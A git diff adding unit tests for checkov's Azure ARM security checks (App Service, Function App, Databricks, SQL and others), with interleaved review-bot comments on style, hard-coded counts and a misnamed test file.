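Review bot: `skipped_resources = {}` is an empty dict, not a set, so `len(skipped_resources)` only coincidentally reads as an expected count; the other tests in this commit assert `self.assertEqual(summary['skipped'], 0)` directly, and this file and test_AppServiceJavaVersion.py should do the same. `set([c.resource for c in report.passed_checks])` materialises a list just to convert it; the set comprehension `{c.resource for c in report.passed_checks}` used by the sibling tests is the idiomatic form, here, in test_AppServiceJavaVersion.py and in test_AppServiceIdentityProviderEnabled.py. The double blank line before the first `assertEqual` is also out of step with the rest of the method.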
@@ -0,0 +1,38 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.checks.resource.AppServiceDisallowCORS import check
+
+
+class TestAPPServiceDisallowCORS(unittest.TestCase):
+
+ def test_summary(self):
+ # given
+ test_files_dir = Path(__file__).parent / "example_AppServiceDisallowCORS"
+
+ # when
+ report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+ # then
+ summary = report.get_summary()
+
+ passing_resources = {
+ "Microsoft.Web/sites.pass",
+
+ }
+ failing_resources = {
+ "Microsoft.Web/sites.fail",
+ }
+
+ passed_check_resources = {c.resource for c in report.passed_checks}
+ failed_check_resources = {c.resource for c in report.failed_checks}
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
diff --git a/tests/arm/checks/resource/test_AppServiceIdentityProviderEnabled.py b/tests/arm/checks/resource/test_AppServiceIdentityProviderEnabled.py
new file mode 100644
index 00000000000..050e63e593d
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppServiceIdentityProviderEnabled.py
@@ -0,0 +1,39 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.AppServiceIdentityProviderEnabled import check
+
+
+class TestAppServiceIdentityProviderEnabled(unittest.TestCase):
+
+ def test(self):
+ runner = Runner()
+ current_dir = os.path.dirname(os.path.realpath(__file__))
+
+ test_files_dir = os.path.join(current_dir, "example_AppServiceIdentityProviderEnabled")
+ report = runner.run(root_folder=test_files_dir,runner_filter=RunnerFilter(checks=[check.id]))
+ summary = report.get_summary()
+
+ passing_resources = {
+ "Microsoft.Web/sites.pass",
+ }
+ failing_resources = {
+ "Microsoft.Web/sites.fail",
+ }
+
+
+
+ passed_check_resources = set([c.resource for c in report.passed_checks])
+ failed_check_resources = set([c.resource for c in report.failed_checks])
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
+
+
diff --git a/tests/arm/checks/resource/test_AppServiceJavaVersion.py b/tests/arm/checks/resource/test_AppServiceJavaVersion.py
new file mode 100644
index 00000000000..a554d699363
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppServiceJavaVersion.py
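Review bot: `runner.run(root_folder=test_files_dir,runner_filter=RunnerFilter(checks=[check.id]))` is missing the space after the comma, and the three consecutive blank lines before `passed_check_resources` plus the two trailing blank lines at end of file are the kind of thing the project's formatter would flag. Running this file through the same formatter as the sibling tests fixes all of them at once.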
@@ -0,0 +1,41 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.AppServiceJavaVersion import check
+
+
+class TestAppServiceJavaVersion(unittest.TestCase):
+
+ def test(self):
+ runner = Runner()
+ current_dir = os.path.dirname(os.path.realpath(__file__))
+
+ test_files_dir = os.path.join(current_dir, "example_AppServiceJavaVersion")
+ report = runner.run(root_folder=test_files_dir,
+ runner_filter=RunnerFilter(checks=[check.id]))
+ summary = report.get_summary()
+
+ passing_resources = {
+ 'Microsoft.Web/sites.pass',
+ }
+ failing_resources = {
+ 'Microsoft.Web/sites.fail',
+ }
+ skipped_resources = {}
+
+ passed_check_resources = set([c.resource for c in report.passed_checks])
+ failed_check_resources = set([c.resource for c in report.failed_checks])
+
+ self.assertEqual(summary['passed'], len(passing_resources))
+ self.assertEqual(summary['failed'], len(failing_resources))
+ self.assertEqual(summary['skipped'], len(skipped_resources))
+ self.assertEqual(summary['parsing_errors'], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/arm/checks/resource/test_AppServicePythonVersion.py b/tests/arm/checks/resource/test_AppServicePythonVersion.py
new file mode 100644
index 00000000000..bb7219084ae
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppServicePythonVersion.py
@@ -0,0 +1,39 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.AppServicePythonVersion import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestAppServicePythonVersion(unittest.TestCase):
+
+ def test_summary(self):
+ # given
+ test_files_dir = Path(__file__).parent / "example_AppServicePythonVersion"
+
+ # when
+ report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+ # then
+ summary = report.get_summary()
+
+ passing_resources = {
+ "Microsoft.Web/sites.pass",
+
+ }
+ failing_resources = {
+ "Microsoft.Web/sites.fail",
+ "Microsoft.Web/sites.unknown",
+ }
+
+ passed_check_resources = {c.resource for c in report.passed_checks}
+ failed_check_resources = {c.resource for c in report.failed_checks}
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
diff --git a/tests/arm/checks/resource/test_AppServiceRemoteDebuggingNotEnabled.py b/tests/arm/checks/resource/test_AppServiceRemoteDebuggingNotEnabled.py
new file mode 100644
index 00000000000..adda9dccc97
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppServiceRemoteDebuggingNotEnabled.py
@@ -0,0 +1,36 @@
+import os
+import unittest
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.AppServiceRemoteDebuggingNotEnabled import check
+
+
+class TestAppServiceRemoteDebuggingNotEnabled(unittest.TestCase):
+
+ def test(self):
+ runner = Runner()
+ current_dir = os.path.dirname(os.path.realpath(__file__))
+
+ test_files_dir = os.path.join(current_dir, "example_AppServiceRemoteDebuggingNotEnabled")
+ report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+ summary = report.get_summary()
+
+ passing_resources = {
+ "Microsoft.Web/sites.pass",
+ "Microsoft.Web/sites.pass1",
+ }
+ failing_resources = {
+ "Microsoft.Web/sites.fail",
+ }
+
+ passed_check_resources = {c.resource for c in report.passed_checks}
+ failed_check_resources = {c.resource for c in report.failed_checks}
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
+
diff --git a/tests/arm/checks/resource/test_AutomationEncrypted.py b/tests/arm/checks/resource/test_AutomationEncrypted.py
new file mode 100644
index 00000000000..31e3afc609a
--- /dev/null
+++ b/tests/arm/checks/resource/test_AutomationEncrypted.py
@@ -0,0 +1,36 @@
+import os
+import unittest
+
+from checkov.arm.checks.resource.AutomationEncrypted import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestAutomationEncrypted(unittest.TestCase):
+ def test_summary(self):
+ runner = Runner()
+ current_dir = os.path.dirname(os.path.realpath(__file__))
+
+ test_files_dir = current_dir + "/example_AutomationEncrypted"
+ report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+ summary = report.get_summary()
+
+ passing_resources = {
+ "Microsoft.Automation/automationAccounts/variables.pass",
+ }
+
+ failing_resources = {
+ "Microsoft.Automation/automationAccounts/variables.fail",
+ "Microsoft.Automation/automationAccounts/variables.fail1",
+ }
+
+ passed_check_resources = {c.resource for c in report.passed_checks}
+ failed_check_resources = {c.resource for c in report.failed_checks}
+
+ self.assertEqual(summary["passed"], 1)
+ self.assertEqual(summary["failed"], 2)
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
diff --git a/tests/arm/checks/resource/test_AzureBatchAccountUsesKeyVaultEncryption.py b/tests/arm/checks/resource/test_AzureBatchAccountUsesKeyVaultEncryption.py
new file mode 100644
index 00000000000..f788cd6b313
--- /dev/null
+++ b/tests/arm/checks/resource/test_AzureBatchAccountUsesKeyVaultEncryption.py
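Review bot: `self.assertEqual(summary["passed"], 1)` and `self.assertEqual(summary["failed"], 2)` hard-code counts that duplicate the sizes of `passing_resources` and `failing_resources` declared just above, so adding a fixture later means editing two places; the sibling tests use `len(passing_resources)` / `len(failing_resources)`, and test_AzureMLWorkspacePrivateEndpoint.py has the same duplication. `test_files_dir = current_dir + "/example_AutomationEncrypted"` builds the path by string concatenation where the other os-based tests use `os.path.join(current_dir, ...)`; the same pattern appears in test_DataExplorerUsesDiskEncryption.py and in both Databricks tests.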
@@ -0,0 +1,39 @@
+import unittest
+from pathlib import Path
+from checkov.arm.checks.resource.AzureBatchAccountUsesKeyVaultEncryption import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestAzureBatchAccountUsesKeyVaultEncryption(unittest.TestCase):
+ def test_summary(self):
+ # given
+ test_files_dir = Path(__file__).parent / "example_AzureBatchAccountUsesKeyVaultEncryption"
+
+ # when
+ report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+ # then
+ summary = report.get_summary()
+
+ passing_resources = {
+ "Microsoft.Batch/batchAccounts.pass",
+ }
+ failing_resources = {
+ "Microsoft.Batch/batchAccounts.fail",
+ }
+
+ passed_check_resources = {c.resource for c in report.passed_checks}
+ failed_check_resources = {c.resource for c in report.failed_checks}
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/arm/checks/resource/test_AzureDefenderOnStorage.py b/tests/arm/checks/resource/test_AzureDefenderOnStorage.py
new file mode 100644
index 00000000000..015826b2750
--- /dev/null
+++ b/tests/arm/checks/resource/test_AzureDefenderOnStorage.py
@@ -0,0 +1,33 @@
+import unittest
+from checkov.arm.checks.resource.AzureDefenderOnStorage import check
+from pathlib import Path
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestAzureDefenderOnStorage(unittest.TestCase):
+ def test_summary(self):
+ test_files_dir = Path(__file__).parent / "example_AzureDefenderOnStorage"
+ report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+ summary = report.get_summary()
+ passing_resources = {
+ "Microsoft.Security/pricings.pass",
+ }
+ failing_resources = {
+ "Microsoft.Security/pricings.fail",
+ }
+
+ passed_check_resources = {c.resource for c in report.passed_checks}
+ failed_check_resources = {c.resource for c in report.failed_checks}
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passed_check_resources, passing_resources)
+ self.assertEqual(failed_check_resources, failing_resources)
+
+
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/arm/checks/resource/test_AzureMLWorkspacePrivateEndpoint.py b/tests/arm/checks/resource/test_AzureMLWorkspacePrivateEndpoint.py
new file mode 100644
index 00000000000..63d1b7407d5
--- /dev/null
+++ b/tests/arm/checks/resource/test_AzureMLWorkspacePrivateEndpoint.py
@@ -0,0 +1,42 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.AzureMLWorkspacePrivateEndpoint import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestAzureMLWorkspacePrivateEndpoint(unittest.TestCase):
+ def test_summary(self):
+ # given
+ test_files_dir = Path(__file__).parent / "example_AzureMLWorkspacePrivateEndpoint"
+
+ # when
+ report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+ # then
+ summary = report.get_summary()
+
+ passing_resources = {
+ "Microsoft.MachineLearningServices/workspaces.pass1",
+ "Microsoft.MachineLearningServices/workspaces.pass2"
+ }
+ failing_resources = {
+ "Microsoft.MachineLearningServices/workspaces.fail1",
+ "Microsoft.MachineLearningServices/workspaces.fail2",
+ }
+
+ passed_check_resources = {c.resource for c in report.passed_checks}
+ failed_check_resources = {c.resource for c in report.failed_checks}
+
+ self.assertEqual(summary["passed"], 2)
+ self.assertEqual(summary["failed"], 2)
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/arm/checks/resource/test_CognitiveServicesConfigureIdentity.py b/tests/arm/checks/resource/test_CognitiveServicesConfigureIdentity.py
new file mode 100644
index 00000000000..c049788d9fb
--- /dev/null
+++ b/tests/arm/checks/resource/test_CognitiveServicesConfigureIdentity.py
@@ -0,0 +1,40 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.CognitiveServicesConfigureIdentity import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestCognitiveServicesConfigureIdentity(unittest.TestCase):
+ def test_summary(self):
+ # given
+ test_files_dir = Path(__file__).parent / "example_CognitiveServicesConfigureIdentity"
+
+ # when
+ report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+ # then
+ summary = report.get_summary()
+
+ passing_resources = {
+ "Microsoft.CognitiveServices/accounts.pass",
+ }
+ failing_resources = {
+ "Microsoft.CognitiveServices/accounts.fail",
+ }
+
+ passed_check_resources = {c.resource for c in report.passed_checks}
+ failed_check_resources = {c.resource for c in report.failed_checks}
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/arm/checks/resource/test_CognitiveServicesEnableLocalAuth.py b/tests/arm/checks/resource/test_CognitiveServicesEnableLocalAuth.py
new file mode 100644
index 00000000000..9c47dca9a0e
--- /dev/null
+++ b/tests/arm/checks/resource/test_CognitiveServicesEnableLocalAuth.py
@@ -0,0 +1,41 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.CognitiveServicesEnableLocalAuth import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestCognitiveServicesEnableLocalAuth(unittest.TestCase):
+ def test_summary(self):
+ # given
+ test_files_dir = Path(__file__).parent / "example_CognitiveServicesEnableLocalAuth"
+
+ # when
+ report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+ # then
+ summary = report.get_summary()
+
+ passing_resources = {
+ "Microsoft.CognitiveServices/accounts.pass",
+ }
+ failing_resources = {
+ "Microsoft.CognitiveServices/accounts.fail",
+ "Microsoft.CognitiveServices/accounts.fail2",
+ }
+
+ passed_check_resources = {c.resource for c in report.passed_checks}
+ failed_check_resources = {c.resource for c in report.failed_checks}
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/arm/checks/resource/test_DataExplorerUsesDiskEncryption.py b/tests/arm/checks/resource/test_DataExplorerUsesDiskEncryption.py
new file mode 100644
index 00000000000..fe6a51f5aff
--- /dev/null
+++ b/tests/arm/checks/resource/test_DataExplorerUsesDiskEncryption.py
@@ -0,0 +1,39 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.checks.resource.DataExplorerUsesDiskEncryption import check
+from checkov.arm.runner import Runner
+
+
+class TestDataExplorerUsesDiskEncryption(unittest.TestCase):
+ def test(self):
+ runner = Runner()
+ current_dir = os.path.dirname(os.path.realpath(__file__))
+ test_files_dir = current_dir + "/example_DataExplorerUsesDiskEncryption"
+
+ report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+ summary = report.get_summary()
+
+ passing_resources = {
+ "Microsoft.Kusto/clusters.pass",
+ }
+ failing_resources = {
+ "Microsoft.Kusto/clusters.fail",
+
+ }
+
+ passed_check_resources = {c.resource for c in report.passed_checks}
+ failed_check_resources = {c.resource for c in report.failed_checks}
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/arm/checks/resource/test_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py b/tests/arm/checks/resource/test_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py
new file mode 100644
index 00000000000..f760685abda
--- /dev/null
+++ b/tests/arm/checks/resource/test_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py
@@ -0,0 +1,26 @@
+import os
+import unittest
+
+from checkov.arm.checks.resource.DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestDatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey(unittest.TestCase):
+
+ def test_summary(self):
+ runner = Runner()
+ current_dir = os.path.dirname(os.path.realpath(__file__))
+
+ test_files_dir = current_dir + "/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey"
+ report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+ summary = report.get_summary()
+
+ self.assertEqual(summary['passed'], 1)
+ self.assertEqual(summary['failed'], 2)
+ self.assertEqual(summary['skipped'], 0)
+ self.assertEqual(summary['parsing_errors'], 0)
+
+
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/arm/checks/resource/test_DatabricksWorkspaceDataPlaneToControlPlaneCommunicateOverPrivateLink.py b/tests/arm/checks/resource/test_DatabricksWorkspaceDataPlaneToControlPlaneCommunicateOverPrivateLink.py
new file mode 100644
index 00000000000..09ec78eba45
--- /dev/null
+++ b/tests/arm/checks/resource/test_DatabricksWorkspaceDataPlaneToControlPlaneCommunicateOverPrivateLink.py
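Review bot: This test only checks the four summary counts and never compares resource names, so a check that passes the wrong fixture resource and fails a different one would still satisfy `self.assertEqual(summary['passed'], 1)` and `self.assertEqual(summary['failed'], 2)`. Add `passing_resources` / `failing_resources` sets and the `{c.resource for c in report.passed_checks}` comparison the other new tests in this commit perform. The same gap exists in the next file, test_DatabricksWorkspaceDataPlaneToControlPlaneCommunicateOverPrivateLink.py.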
@@ -0,0 +1,26 @@
+import os
+import unittest
+
+from checkov.arm.checks.resource.DatabricksWorkspaceIsNotPublic import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestDatabricksWorkspaceIsNotPublic(unittest.TestCase):
+
+ def test_summary(self):
+ runner = Runner()
+ current_dir = os.path.dirname(os.path.realpath(__file__))
+
+ test_files_dir = current_dir + "/example_DatabricksWorkspaceIsNotPublic"
+ report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+ summary = report.get_summary()
+
+ self.assertEqual(summary['passed'], 2)
+ self.assertEqual(summary['failed'], 2)
+ self.assertEqual(summary['skipped'], 0)
+ self.assertEqual(summary['parsing_errors'], 0)
+
+
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/arm/checks/resource/test_FunctionAppDisallowCORS.py b/tests/arm/checks/resource/test_FunctionAppDisallowCORS.py
new file mode 100644
index 00000000000..93127cb1f91
--- /dev/null
+++ b/tests/arm/checks/resource/test_FunctionAppDisallowCORS.py
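Review bot: The file is named test_DatabricksWorkspaceDataPlaneToControlPlaneCommunicateOverPrivateLink.py but it imports `DatabricksWorkspaceIsNotPublic`, defines `TestDatabricksWorkspaceIsNotPublic` and scans `example_DatabricksWorkspaceIsNotPublic`, so either the file is misnamed or its body was copied from the wrong sibling. If a private-link check of that name exists in this commit it currently has no test at all; if it does not, the file should be renamed to test_DatabricksWorkspaceIsNotPublic.py (assuming no such file already exists). Either way `self.assertEqual(summary['passed'], 2)` / `self.assertEqual(summary['failed'], 2)` are asserted without the resource-name comparison the other tests perform.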
@@ -0,0 +1,42 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.FunctionAppDisallowCORS import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestFunctionAppDisallowCORS(unittest.TestCase):
+
+ def test_summery(self):
+ # given
+ test_files_dir = Path(__file__).parent / "example_FunctionAppDisallowCORS"
+
+ # when
+ report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+ # then
+ summary = report.get_summary()
+
+ passing_resources = {
+ "Microsoft.Web/sites.pass_with_cors",
+ "Microsoft.Web/sites.pass",
+ }
+
+ failing_resources = {
+ "Microsoft.Web/sites.fail",
+ }
+
+ passed_check_resources = {c.resource for c in report.passed_checks}
+ failed_check_resources = {c.resource for c in report.failed_checks}
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
+
+if __name__ == '__main__':
+ unittest.main()
\ No newline at end of file
diff --git a/tests/arm/checks/resource/test_FunctionAppHttpVersionLatest.py b/tests/arm/checks/resource/test_FunctionAppHttpVersionLatest.py
new file mode 100644
index 00000000000..ae744f6845d
--- /dev/null
+++ b/tests/arm/checks/resource/test_FunctionAppHttpVersionLatest.py
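Review bot: `def test_summery(self):` is misspelled; it still runs because the name starts with `test`, but it should be `def test_summary(self):` like every other test in this commit. The `if __name__ == '__main__':` guard is separated from the class by a single blank line where PEP 8 expects two, and the file lacks a trailing newline, as the `\ No newline at end of file` marker shows.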
@@ -0,0 +1,38 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.FunctionAppHttpVersionLatest import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestFunctionAppHttpVersionLatest(unittest.TestCase):
+
+ def test_summary(self):
+ # given
+ test_files_dir = Path(__file__).parent / "example_FunctionAppHttpVersionLatest"
+ # when
+ report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+ # then
+ summary = report.get_summary()
+
+ passing_resources = {
+ "Microsoft.Web/sites/slots.pass",
+ "Microsoft.Web/sites.pass2",
+
+ }
+ failing_resources = {
+ "Microsoft.Web/sites/slots.fail",
+ "Microsoft.Web/sites.fail2"
+ }
+
+ passed_check_resources = {c.resource for c in report.passed_checks}
+ failed_check_resources = {c.resource for c in report.failed_checks}
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
diff --git a/tests/arm/checks/resource/test_FunctionAppMinTLSVersion.py b/tests/arm/checks/resource/test_FunctionAppMinTLSVersion.py
new file mode 100644
index 00000000000..8fb3007b04d
--- /dev/null
+++ b/tests/arm/checks/resource/test_FunctionAppMinTLSVersion.py
@@ -0,0 +1,44 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.FunctionAppMinTLSVersion import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestFunctionAppMinTLSVersion(unittest.TestCase):
+ def test_summary(self):
+ # given
+ test_files_dir = Path(__file__).parent / "example_FunctionAppMinTLSVersion"
+
+ # when
+ report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+ # then
+ summary = report.get_summary()
+
+ passing_resources = {
+ "Microsoft.Web/sites.pass",
+ "Microsoft.Web/sites.pass2",
+ "Microsoft.Web/sites/slots.pass3",
+ "Microsoft.Web/sites/slots.pass4",
+ }
+ failing_resources = {
+ "Microsoft.Web/sites.fail",
+ "Microsoft.Web/sites/slots.fail2",
+ }
+
+ passed_check_resources = {c.resource for c in report.passed_checks}
+ failed_check_resources = {c.resource for c in report.failed_checks}
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/arm/checks/resource/test_FunctionAppsEnableAuthentication.py b/tests/arm/checks/resource/test_FunctionAppsEnableAuthentication.py
new file mode 100644
index 00000000000..ecb231dd73d
--- /dev/null
+++ b/tests/arm/checks/resource/test_FunctionAppsEnableAuthentication.py
@@ -0,0 +1,38 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.FunctionAppsEnableAuthentication import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestFunctionAppsEnableAuthentication(unittest.TestCase):
+
+ def test_summary(self):
+ # given
+ test_files_dir = Path(__file__).parent / "example_FunctionAppsEnableAuthentication"
+
+ # when
+ report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+ # then
+ summary = report.get_summary()
+
+ passing_resources = {
+ "Microsoft.Web/sites/config.pass",
+ }
+ failing_resources = {
+ "Microsoft.Web/sites/config.fail",
+ "Microsoft.Web/sites/config.fail2",
+ }
+
+ passed_check_resources = {c.resource for c in report.passed_checks}
+ failed_check_resources = {c.resource for c in report.failed_checks}
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+ self.assertEqual(failing_resources, failed_check_resources)
\ No newline at end of file
diff --git a/tests/arm/checks/resource/test_MSSQLServerMinTLSVersion.py b/tests/arm/checks/resource/test_MSSQLServerMinTLSVersion.py
new file mode 100644
index 00000000000..724892efbf7
--- /dev/null
+++ b/tests/arm/checks/resource/test_MSSQLServerMinTLSVersion.py
@@ -0,0 +1,42 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.MSSQLServerMinTLSVersion import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestMSSQLServerMinTLSVersion(unittest.TestCase):
+
+ def test_summary(self):
+ # given
+ test_files_dir = Path(__file__).parent / "example_MSSQLServerMinTLSVersion"
+
+ # when
+ report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+ # then
+ summary = report.get_summary()
+
+ passing_resources = {
+ "Microsoft.Sql/servers.pass"
+ }
+
+ failing_resources = {
+ "Microsoft.Sql/servers.fail"
+ }
+
+ passed_check_resources = {c.resource for c in report.passed_checks}
+ failed_check_resources = {c.resource for c in report.failed_checks}
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertSetEqual(passing_resources, passed_check_resources)
+ self.assertSetEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/arm/checks/resource/test_MySQLPublicAccessDisabled.py b/tests/arm/checks/resource/test_MySQLPublicAccessDisabled.py
new file mode 100644
index 00000000000..12bc369b81e
--- /dev/null
+++ b/tests/arm/checks/resource/test_MySQLPublicAccessDisabled.py
@@ -0,0 +1,42 @@
+import os
+
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.MySQLPublicAccessDisabled import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
